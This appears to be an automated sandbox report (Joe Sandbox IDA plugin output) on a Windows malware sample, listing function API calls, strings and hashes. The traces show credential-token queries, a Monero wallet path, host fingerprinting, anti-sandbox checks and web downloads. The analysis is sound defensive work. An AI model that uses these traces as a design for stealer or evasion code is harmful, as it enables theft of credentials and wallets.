Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 9f2e4539c10fd12fa9bb87896d47a0038a42a98919078255361d89ea712205f4
Instruction ID: 13d796a7082a902013f333db9c996eac5a23beed4dcd89c577630b7529505946
Opcode Fuzzy Hash: 9f2e4539c10fd12fa9bb87896d47a0038a42a98919078255361d89ea712205f4
Instruction Fuzzy Hash: 03B11B71910108ABDB84FBE0DD96EEE737AAF15300F50415EF506A6092EF34AE49CF66

Function 00694FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00694FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00694FD1
InternetOpenA.WININET(006B0DDF,00000000,00000000,00000000,00000000), ref: 00694FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00695011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00695041
InternetCloseHandle.WININET(?), ref: 006950B9
InternetCloseHandle.WININET(?), ref: 006950C6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 054de8d4c474290e55a9ef1e0b69abec8960e44c0abf477b399a6a767016a159
Instruction ID: 601b3c87041580302925f0ffeeb5a89be815274642ab8aad50160756f04e5b65
Opcode Fuzzy Hash: 054de8d4c474290e55a9ef1e0b69abec8960e44c0abf477b399a6a767016a159
Instruction Fuzzy Hash: 783105B4A00218ABDB24DF54DC85BDDB7B9FB48704F2081D9EA09A7280C7706EC58F99

Function 006A83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
wsprintfA.USER32 ref: 006A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 006A847B
RegCloseKey.ADVAPI32(00000000), ref: 006A848C
RegCloseKey.ADVAPI32(00000000), ref: 006A8499

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

RegQueryValueExA.KERNEL32(00000000,0135E098,00000000,000F003F,?,00000400), ref: 006A84EC
lstrlen.KERNEL32(?), ref: 006A8501
RegQueryValueExA.KERNEL32(00000000,0135DFF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006B0B34), ref: 006A8599
RegCloseKey.KERNEL32(00000000), ref: 006A8608
RegCloseKey.ADVAPI32(00000000), ref: 006A861A

Strings

%s\%s, xrefs: 006A844D

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 8478a1890e73e11f8940969b311ba1ff6d7c07319c22447b53d58b75ed52ca57
Instruction ID: b1af3d04a59c19f12e0f728aae7494639a94d19474fa96d982f8216720bfb077
Opcode Fuzzy Hash: 8478a1890e73e11f8940969b311ba1ff6d7c07319c22447b53d58b75ed52ca57
Instruction Fuzzy Hash: A3210AB19012189FDB68DB54DC85FE9B7B9FB48700F10C199E60996140DF71AE85CFD4

Function 006A7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A76A4
RtlAllocateHeap.NTDLL(00000000), ref: 006A76AB
RegOpenKeyExA.KERNEL32(80000002,0134C240,00000000,00020119,00000000), ref: 006A76DD
RegQueryValueExA.KERNEL32(00000000,0135DFD8,00000000,00000000,?,000000FF), ref: 006A76FE
RegCloseKey.ADVAPI32(00000000), ref: 006A7708

Strings

Windows 11, xrefs: 006A76BD

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
Instruction ID: 88fc5fa67054846b9f33120d83a2612d5a5b64bcb71a355b302ef9abf83a141a
Opcode Fuzzy Hash: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
Instruction Fuzzy Hash: C9014FB5A45204BBEB04EBE4DC49FAEB7B9FB48701F204155FA04A7290D67099009F51

Function 006A7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7734
RtlAllocateHeap.NTDLL(00000000), ref: 006A773B
RegOpenKeyExA.KERNEL32(80000002,0134C240,00000000,00020119,006A76B9), ref: 006A775B
RegQueryValueExA.KERNEL32(006A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006A777A
RegCloseKey.ADVAPI32(006A76B9), ref: 006A7784

Strings

CurrentBuildNumber, xrefs: 006A7771

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
Instruction ID: cad26b8189b524b72071b478516a7b74045f5b2b71fb5e484219a4d261cce944
Opcode Fuzzy Hash: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
Instruction Fuzzy Hash: 9C0144B5A40308BBD704DBE4DC49FAEB7B8FB44701F104559FA05A7281D67059408F51

Function 006A40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006A40D5
RegOpenKeyExA.KERNEL32(80000001,0135DB40,00000000,00020119,?), ref: 006A40F4
RegQueryValueExA.ADVAPI32(?,0135E260,00000000,00000000,00000000,000000FF), ref: 006A4118
RegCloseKey.ADVAPI32(?), ref: 006A4122
lstrcat.KERNEL32(?,00000000), ref: 006A4147
lstrcat.KERNEL32(?,0135E458), ref: 006A415B

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 996fd2825c1f64037123f42f82d30718b37b99ee671f17ee25795286c44267f8
Instruction ID: d75f2194d8d77964aaec1d40af1cf15453f90fe6cf63b1904440ce9a2f1e229e
Opcode Fuzzy Hash: 996fd2825c1f64037123f42f82d30718b37b99ee671f17ee25795286c44267f8
Instruction Fuzzy Hash: BB41D7B6D001086BDF18FBA0DC56FFE733EBB89300F50465DB61657181EA755B888BA2

Function 006A69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,01352278), ref: 006A98A1
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,013524D0), ref: 006A98BA
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,01352290), ref: 006A98D2
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,013522A8), ref: 006A98EA
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,01352350), ref: 006A9903
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,01359238), ref: 006A991B
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,01345970), ref: 006A9933
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,013457D0), ref: 006A994C
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,013522C0), ref: 006A9964
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,01352398), ref: 006A997C
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,013524A0), ref: 006A9995
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,013522F0), ref: 006A99AD
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,013458B0), ref: 006A99C5
Part of subcall function 006A9860: GetProcAddress.KERNEL32(74DD0000,01352428), ref: 006A99DE

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006911D0: ExitProcess.KERNEL32 ref: 00691211

Part of subcall function 00691160: GetSystemInfo.KERNEL32(?), ref: 0069116A
Part of subcall function 00691160: ExitProcess.KERNEL32 ref: 0069117E

Part of subcall function 00691110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0069112B
Part of subcall function 00691110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00691132
Part of subcall function 00691110: ExitProcess.KERNEL32 ref: 00691143

Part of subcall function 00691220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
Part of subcall function 00691220: __aulldiv.LIBCMT ref: 00691258
Part of subcall function 00691220: __aulldiv.LIBCMT ref: 00691266
Part of subcall function 00691220: ExitProcess.KERNEL32 ref: 00691294

Part of subcall function 006A6770: GetUserDefaultLangID.KERNEL32 ref: 006A6774

Part of subcall function 00691190: ExitProcess.KERNEL32 ref: 006911C6

Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
Part of subcall function 006A7850: RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
Part of subcall function 006A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01359128,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
CloseHandle.KERNEL32(00000000), ref: 006A6AF9
Sleep.KERNEL32(00001770), ref: 006A6B04
CloseHandle.KERNEL32(?,00000000,?,01359128,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
ExitProcess.KERNEL32 ref: 006A6B22

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: a060417ba9fb41c388d2b95613762ecaac3c886c3926cdcdc6c8f1c75bc93285
Instruction ID: d5c4f1bd82f38b69b91021cef487c75f9839e3a0866db010f564d4b6d5d3740c
Opcode Fuzzy Hash: a060417ba9fb41c388d2b95613762ecaac3c886c3926cdcdc6c8f1c75bc93285
Instruction Fuzzy Hash: 95313E70910209AADB84F7F0DC56BEE777AAF06300F20461EF212A6192DF745D05CFAA

Function 006999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
LocalFree.KERNEL32(0069148F), ref: 00699A90
CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
